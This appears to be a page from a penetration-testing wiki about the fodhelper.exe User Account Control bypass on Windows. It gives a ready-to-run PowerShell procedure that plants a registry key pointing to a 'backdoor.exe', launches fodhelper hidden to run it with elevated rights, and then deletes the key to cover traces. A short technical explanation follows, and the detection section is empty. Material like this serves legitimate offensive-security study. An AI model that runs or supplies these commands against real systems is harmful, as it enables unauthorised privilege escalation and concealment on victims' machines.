UAC Bypass

UAC Bypass technique I - fodhelper.exe

Procedure

PS> $command = "C:\Temp\backdoor.exe
PS> New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
PS> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
PS> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $command -Force
PS> Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
PS> Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Technical Context

The process of foldhelper will be running as high integrity to perform tasks like typing, text to speech, such kind of Windows Features. @winscripting discovered that the fodhelper process will look for some registry keys which could be leveraged to execute code. The registry paths are:

HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute

Analytic I

Coming Soon

Reference

UAC Bypass – FodhelperPenetration Testing Lab

PreviousUser Account Control (UAC)NextMetasploit

Last updated 4 years ago

Was this helpful?